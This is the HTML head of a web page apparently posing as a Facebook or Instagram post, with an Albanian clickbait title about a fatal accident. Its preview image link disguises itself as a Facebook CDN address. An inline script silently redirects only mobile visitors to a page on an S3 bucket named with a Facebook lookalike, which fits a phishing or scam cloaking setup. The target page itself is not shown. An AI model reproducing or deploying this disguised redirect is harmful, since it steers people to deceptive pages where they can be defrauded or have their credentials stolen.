<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="219,142,105,vizitat"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Një aksident tragjik ka marrë disa jetë njerëzish mëngjesin e sotëm."/>
<meta property="og:image" content="https://scontent-fsdq1--2-fna-fbcdn-net.translate.goog/v/t39.30808-6/434377734_809342207906714_1548192285738997843_n.jpg?stp=dst-jpg_p180x540&_nc_cat=109&ccb=1-7&_nc_sid=5f2048&_nc_eui2=AeE4rbbGrqk9c4ct0vqQR1DsOXodOqMoH805eh06oygfzUUO8Ce2zccmjJcnXz5U1tYjGWfGD0SwtJz0ShyA-eH6&_nc_ohc=stiB81x26cMAX93-4-a&_nc_zt=23&_nc_ht=scontent.fsdq1-2.fna&oh=00_AfD1ONozAbKWfUxhnaU39XrKKvLSqxuyVZpqGHl5T83CeQ&oe=660C8DA6&_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp;👨👵🧓👴👲👳%E2%80%8D♀%EF%B8%8F👳%E2%80%8D♂%EF%B8%8F🧕?ms=facebook&auto=1&campaign_id=120202450306420044&adgroup_id=120202450306410044&ad_id=120202450490120044&fbclid=IwAR1YqeX0xDfbjCbMflKwP6z-0Ongio95ofLkM6z_XP2JrXmxPQUdD5Amvog?post_id=754167459898401&view=permalink?utm_campaign=SA-FR-Traffic-JOR23-05-Jordan-(SF)&utm_content=FB%252BIG-All18-65%252B-Jordan-Broad&utm_term=6452846822642&utm_source=FacebookInstagram&utm_medium=SocialPaid&fbclid=IwAR2QaqyD5YXn2_EX2Y_ONi18clZ4TsDem917Am288FeaQRPoTDYVb9WGvbA&channel_url=https%3A%2F%2Fstaticxx.-.com%2Fconnect%2Fxd_arbiter%2Fr%2F__Bz3h5RzMx.js"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
    //<![CDATA[
        var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    
        if (isMobile) {
            window.location.href = "https://faceboovbefadz217894.s3.eu-central-1.amazonaws.com/faskimng0012-brau2/jefffbulss454.html";
        }
    //]]>
    </script>
    